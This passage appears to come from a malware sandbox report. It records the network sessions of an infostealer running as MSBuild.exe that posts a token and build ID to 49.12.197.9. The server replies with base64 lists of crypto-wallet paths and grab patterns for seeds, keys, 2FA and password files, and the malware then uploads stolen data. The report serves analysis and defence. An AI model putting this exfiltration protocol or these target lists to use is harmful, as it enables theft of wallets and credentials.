                                                                                                                                                                                                                    Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    17192.168.2.85625349.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:15:01 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCF
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Content-Length: 1081
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:15:01 UTC1081OUTData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                    Data Ascii: ------BGDGHJEHJJDAAAKEBGCFContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------BGDGHJEHJJDAAAKEBGCFContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------BGDGHJEHJJDAAAKEBGCFCont
                                                                                                                                                                                                                    2024-10-03 13:15:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:15:02 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-10-03 13:15:02 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    18192.168.2.85625449.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:15:02 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----BAECFCAAECBGDGDHIEHJ
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:15:02 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                    Data Ascii: ------BAECFCAAECBGDGDHIEHJContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------BAECFCAAECBGDGDHIEHJContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------BAECFCAAECBGDGDHIEHJCont
                                                                                                                                                                                                                    2024-10-03 13:15:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:15:03 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-10-03 13:15:03 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                    Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    19192.168.2.85625549.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:15:04 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----CFBAKKJDBKJJJKFHDAEB
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:15:04 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                    Data Ascii: ------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------CFBAKKJDBKJJJKFHDAEBCont
                                                                                                                                                                                                                    2024-10-03 13:15:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:15:04 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-10-03 13:15:04 UTC1524INData Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69
                                                                                                                                                                                                                    Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    20192.168.2.85625649.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:15:05 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----EBGDHJECFCFCAKFHCFID
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Content-Length: 461
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:15:05 UTC461OUTData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 44 48 4a 45 43 46 43 46 43 41 4b 46 48 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 48 4a 45 43 46 43 46 43 41 4b 46 48 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 48 4a 45 43 46 43 46 43 41 4b 46 48 43 46 49 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                    Data Ascii: ------EBGDHJECFCFCAKFHCFIDContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------EBGDHJECFCFCAKFHCFIDContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------EBGDHJECFCFCAKFHCFIDCont
                                                                                                                                                                                                                    2024-10-03 13:15:06 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:15:06 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-10-03 13:15:06 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    21192.168.2.85625749.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:15:07 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKF
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Content-Length: 130417
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:15:07 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                    Data Ascii: ------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------FBKFCFBFIDGCGDHJDBKFCont
                                                                                                                                                                                                                    2024-10-03 13:15:07 UTC16355OUTData Raw: 61 56 67 54 75 4d 4c 45 39 41 50 55 56 36 44 2f 77 6b 73 50 38 41 7a 2b 61 4a 2f 77 43 44 51 66 38 41 78 46 65 56 69 4d 4b 6f 79 58 73 62 74 4e 4a 36 2b 64 7a 30 61 57 49 30 66 74 4e 48 65 78 78 33 69 33 51 57 69 4d 6d 71 57 32 6d 58 46 72 62 35 7a 4f 6b 6a 52 62 56 4a 49 41 4b 37 58 4a 35 4a 36 59 72 6b 4d 49 66 61 76 55 2f 45 31 38 75 6f 65 42 39 51 6c 53 53 31 6b 41 65 4e 63 32 30 2f 6d 72 39 39 4f 70 77 4f 65 65 6e 30 72 79 75 76 61 79 69 63 33 54 6c 43 66 52 6e 7a 4f 65 30 34 4b 74 47 63 46 38 53 31 41 78 2b 68 7a 54 53 70 46 4f 7a 53 68 7a 58 72 6e 68 33 5a 46 69 6f 70 62 6d 47 46 67 73 6a 37 53 52 6e 47 43 61 74 5a 55 6e 6c 66 79 71 74 44 5a 32 6c 39 34 70 30 2b 79 75 33 6b 57 33 75 48 53 4a 32 6a 49 44 44 63 78 41 4f 53 43 4f 70 46 52 55 6c 79 52
                                                                                                                                                                                                                    Data Ascii: aVgTuMLE9APUV6D/wksP8Az+aJ/wCDQf8AxFeViMKoyXsbtNJ6+dz0aWI0ftNHexx3i3QWiMmqW2mXFrb5zOkjRbVJIAK7XJ5J6YrkMIfavU/E18uoeB9QlSS1kAeNc20/mr99OpwOeen0ryuvayic3TlCfRnzOe04KtGcF8S1Ax+hzTSpFOzShzXrnh3ZFiopbmGFgsj7SRnGCatZUnlfyqtDZ2l94p0+yu3kW3uHSJ2jIDDcxAOSCOpFRUlyR
                                                                                                                                                                                                                    2024-10-03 13:15:07 UTC16355OUTData Raw: 6e 2f 54 72 2f 79 62 2f 67 48 74 50 39 73 36 56 2f 30 46 4c 4c 2f 77 49 54 2f 47 76 4d 66 46 30 38 4e 7a 34 6e 75 35 59 4a 55 6c 6a 59 4a 68 34 32 44 41 2f 49 6f 36 69 73 53 69 75 6e 43 5a 5a 39 58 71 65 30 35 72 2f 4c 2f 67 6e 46 6a 38 35 2b 74 30 66 5a 63 6c 76 6e 66 39 41 70 4b 57 69 76 55 50 45 45 6f 70 61 4b 41 4c 2b 67 75 73 57 76 36 66 49 37 42 55 57 34 51 73 7a 48 41 41 7a 31 4e 65 75 66 32 78 70 6e 2f 51 53 73 2f 2b 2f 77 43 6e 2b 4e 65 4a 30 56 35 75 4d 79 37 36 7a 55 55 2b 61 32 6c 74 76 2b 43 65 7a 6c 2b 62 2f 55 36 54 70 38 6c 37 75 2b 39 75 33 6b 2b 78 37 58 2f 62 47 6c 2f 39 42 4f 79 2f 38 43 45 2f 78 70 50 37 5a 30 72 2f 41 4b 43 64 6c 2f 34 45 4a 2f 6a 58 69 74 46 63 6e 39 69 66 39 50 50 77 2f 77 43 43 64 2f 38 41 72 48 2f 30 36 2f 48 2f
                                                                                                                                                                                                                    Data Ascii: n/Tr/yb/gHtP9s6V/0FLL/wIT/GvMfF08Nz4nu5YJUljYJh42DA/Io6isSiunCZZ9Xqe05r/L/gnFj85+t0fZclvnf9ApKWivUPEEopaKAL+gusWv6fI7BUW4QszHAAz1Neuf2xpn/QSs/+/wCn+NeJ0V5uMy76zUU+a2ltv+Cezl+b/U6Tp8l7u+9u3k+x7X/bGl/9BOy/8CE/xpP7Z0r/AKCdl/4EJ/jXitFcn9if9PPw/wCCd/8ArH/06/H/
                                                                                                                                                                                                                    2024-10-03 13:15:07 UTC16355OUTData Raw: 62 47 57 58 44 41 48 37 71 38 4e 75 48 79 6a 6a 72 6d 43 33 30 72 55 6f 4a 4c 43 52 6a 42 4a 4a 5a 57 39 78 62 78 73 2b 53 57 57 62 7a 43 35 62 6e 6b 2f 76 57 77 65 4f 33 57 6d 35 35 68 62 34 56 66 38 41 34 48 2b 5a 4d 61 65 55 71 2f 76 50 38 65 2f 2b 52 30 31 70 43 31 2f 64 51 78 57 4d 6b 56 33 48 4e 61 6d 37 53 65 33 57 52 31 4d 59 63 6f 66 6c 43 62 79 64 77 78 67 4b 54 2b 48 4e 4d 6c 53 53 43 38 6e 74 5a 6b 4b 79 77 73 41 77 77 52 31 47 51 63 45 41 6a 67 6a 67 67 48 31 46 63 39 61 61 5a 66 32 6b 46 74 61 47 47 7a 75 4c 47 47 7a 65 7a 65 32 6d 44 62 5a 6f 32 6b 4d 76 7a 45 4d 43 43 48 49 49 4b 6b 45 59 48 76 6e 58 73 37 61 4b 32 52 68 44 61 78 32 71 48 47 49 59 32 5a 6c 58 41 78 77 57 4a 50 35 6b 31 31 34 61 65 4b 64 54 39 36 74 50 2b 44 2f 6b 63 4f 4e
                                                                                                                                                                                                                    Data Ascii: bGWXDAH7q8NuHyjjrmC30rUoJLCRjBJJZW9xbxs+SWWbzC5bnk/vWweO3Wm55hb4Vf8A4H+ZMaeUq/vP8e/+R01pC1/dQxWMkV3HNam7Se3WR1MYcoflCbydwxgKT+HNMlSSC8ntZkKywsAwwR1GQcEAjgjggH1Fc9aaZf2kFtaGGzuLGGzeze2mDbZo2kMvzEMCCHIIKkEYHvnXs7aK2RhDax2qHGIY2ZlXAxwWJP5k114aeKdT96tP+D/kcON
                                                                                                                                                                                                                    2024-10-03 13:15:07 UTC16355OUTData Raw: 41 66 36 64 6a 36 69 75 57 65 56 4e 30 33 4f 2f 76 58 76 38 41 4c 2f 50 2f 41 49 59 39 32 47 62 4a 56 46 43 33 75 32 74 38 2f 77 44 4c 2f 68 7a 32 66 56 43 44 66 36 49 51 63 67 33 6a 59 2f 38 41 41 65 61 76 50 66 47 66 2f 49 31 58 66 30 6a 2f 41 50 51 46 71 62 77 64 34 67 6d 75 62 76 53 74 43 76 63 6d 35 73 72 74 7a 47 33 58 4b 43 47 55 45 45 2b 78 49 48 30 2b 6c 51 2b 4d 76 2b 52 71 76 50 70 48 2f 77 43 67 4c 55 34 53 6a 4b 6a 69 34 77 6c 32 66 35 73 77 7a 53 74 47 74 67 4a 54 6a 33 58 35 49 77 61 4b 4b 4b 39 38 2b 50 43 69 69 69 67 44 51 38 4c 2f 41 50 49 39 36 4c 2f 32 33 2f 38 41 52 54 56 37 44 58 6a 33 68 66 38 41 35 48 76 52 66 2b 32 2f 2f 6f 70 71 39 49 38 53 32 2b 71 33 57 6e 4a 44 70 52 41 5a 70 50 33 77 38 30 78 6c 6b 77 65 41 77 47 52 7a 6a 4f
                                                                                                                                                                                                                    Data Ascii: Af6dj6iuWeVN03O/vXv8AL/P/AIY92GbJVFC3u2t8/wDL/hz2fVCDf6IQcg3jY/8AAeavPfGf/I1Xf0j/APQFqbwd4gmubvStCvcm5srtzG3XKCGUEE+xIH0+lQ+Mv+RqvPpH/wCgLU4SjKji4wl2f5swzStGtgJTj3X5IwaKKK98+PCiiigDQ8L/API96L/23/8ARTV7DXj3hf8A5HvRf+2//opq9I8S2+q3WnJDpRAZpP3w80xlkweAwGRzjO
                                                                                                                                                                                                                    2024-10-03 13:15:07 UTC16355OUTData Raw: 62 69 31 43 58 51 53 5a 62 57 4e 41 6a 4b 6f 48 7a 4a 6c 67 2b 63 38 38 4c 77 65 70 72 4f 4f 59 55 4a 54 35 46 44 58 2f 68 76 38 7a 65 65 54 34 75 45 4f 64 31 64 4e 2b 75 31 6d 2b 2f 5a 47 6e 35 61 66 33 46 2f 4b 6c 41 43 39 41 42 39 4b 6f 57 74 78 4a 4f 38 66 6e 78 51 70 39 6d 76 58 4e 34 59 45 41 42 67 4d 5a 6b 7a 78 30 2f 31 55 6f 39 42 75 41 47 42 67 56 6e 32 47 74 54 53 36 56 44 71 78 74 62 63 33 41 30 31 72 6f 51 65 58 38 6d 39 37 32 53 4c 63 79 34 77 51 71 34 77 44 78 39 33 71 4f 4b 75 57 59 55 61 63 75 58 6b 73 39 76 36 39 53 49 35 50 69 61 31 4e 7a 39 70 65 4f 6e 66 58 2f 68 6a 6f 4b 4b 7a 57 31 43 57 53 47 4b 65 34 6a 74 66 50 52 62 79 4d 69 47 46 55 53 55 4c 61 50 4b 70 32 71 41 75 35 57 41 35 41 37 6a 50 61 71 6d 6b 61 68 4a 64 57 50 68 35 6d
                                                                                                                                                                                                                    Data Ascii: bi1CXQSZbWNAjKoHzJlg+c88LweprOOYUJT5FDX/hv8zeeT4uEOd1dN+u1m+/ZGn5af3F/KlAC9AB9KoWtxJO8fnxQp9mvXN4YEABgMZkzx0/1Uo9BuAGBgVn2GtTS6VDqxtbc3A01roQeX8m972SLcy4wQq4wDx93qOKuWYUacuXks9v69SI5Pia1Nz9peOnfX/hjoKKzW1CWSGKe4jtfPRbyMiGFUSULaPKp2qAu5WA5A7jPaqmkahJdWPh5m
                                                                                                                                                                                                                    2024-10-03 13:15:07 UTC16355OUTData Raw: 68 73 56 54 78 45 62 77 50 4d 78 75 58 31 73 48 4a 52 71 39 65 71 32 46 6f 70 4b 4b 36 6a 69 43 69 69 69 67 41 6f 70 31 6a 70 36 36 7a 34 68 30 33 53 70 5a 47 53 43 34 64 7a 4c 74 4f 43 56 56 64 32 50 78 78 58 6f 6e 2f 43 75 76 43 75 50 2b 51 58 6e 2f 74 34 6c 2f 77 44 69 71 38 54 46 5a 74 4b 6a 57 6c 53 68 43 2f 4c 75 32 37 64 4c 39 6e 33 50 72 4d 76 34 61 6f 34 6a 43 55 38 54 58 72 4f 50 50 64 70 4b 48 4e 6f 6d 34 36 74 7a 6a 31 54 30 31 50 4f 61 4b 39 48 2f 41 4f 46 64 65 46 66 2b 67 56 2f 35 4d 53 2f 2f 41 42 56 51 33 58 77 32 38 4e 79 77 4d 74 76 61 79 32 6b 33 38 4d 30 63 7a 6b 71 66 6f 78 49 72 6e 2f 74 75 72 2f 7a 36 58 2f 67 58 2f 77 42 71 64 6e 2b 71 6d 43 65 32 4a 6c 2f 34 4c 58 2f 79 78 2f 6b 65 66 55 55 74 33 61 33 65 6a 36 69 32 6d 36 6b 6f
                                                                                                                                                                                                                    Data Ascii: hsVTxEbwPMxuX1sHJRq9eq2FopKK6jiCiiigAop1jp66z4h03SpZGSC4dzLtOCVVd2PxxXon/CuvCuP+QXn/t4l/wDiq8TFZtKjWlShC/Lu27dL9n3PrMv4ao4jCU8TXrOPPdpKHNom46tzj1T01POaK9H/AOFdeFf+gV/5MS//ABVQ3Xw28NywMtvay2k38M0czkqfoxIrn/tur/z6X/gX/wBqdn+qmCe2Jl/4LX/yx/kefUUt3a3ej6i2m6ko
                                                                                                                                                                                                                    2024-10-03 13:15:07 UTC15932OUTData Raw: 4b 4b 4f 53 57 56 2f 75 70 47 68 5a 6d 37 38 41 63 6d 72 62 53 56 32 5a 4a 4e 75 79 45 72 70 76 43 6e 69 43 7a 30 4e 4c 73 58 53 54 4e 35 78 51 72 35 53 67 39 4d 35 7a 6b 6a 31 72 6d 32 6a 6c 53 37 2b 79 50 42 4d 6c 7a 2f 7a 77 61 4a 67 2f 72 39 30 6a 4e 52 43 56 47 6a 4d 69 6b 6d 4d 45 41 75 41 53 41 54 30 79 65 32 63 48 38 71 35 36 39 4f 6e 69 4b 66 4a 4a 36 65 52 32 34 53 74 58 77 64 58 32 6b 49 36 36 37 70 2f 38 41 39 4c 2f 41 4f 45 2b 30 6e 2f 6e 6a 65 66 39 2b 31 2f 2b 4b 70 50 2b 45 2b 30 6e 2f 6e 68 65 2f 77 44 66 74 66 38 41 34 71 76 4f 78 42 63 47 30 4e 32 4c 57 34 4e 71 4d 35 6e 45 4c 47 4d 59 4f 44 38 32 4d 64 66 65 68 49 70 5a 72 57 53 36 68 74 35 35 62 65 50 50 6d 54 52 78 4d 79 4a 67 5a 4f 57 41 77 4f 4b 34 50 37 4c 77 76 38 37 2b 39 66 35
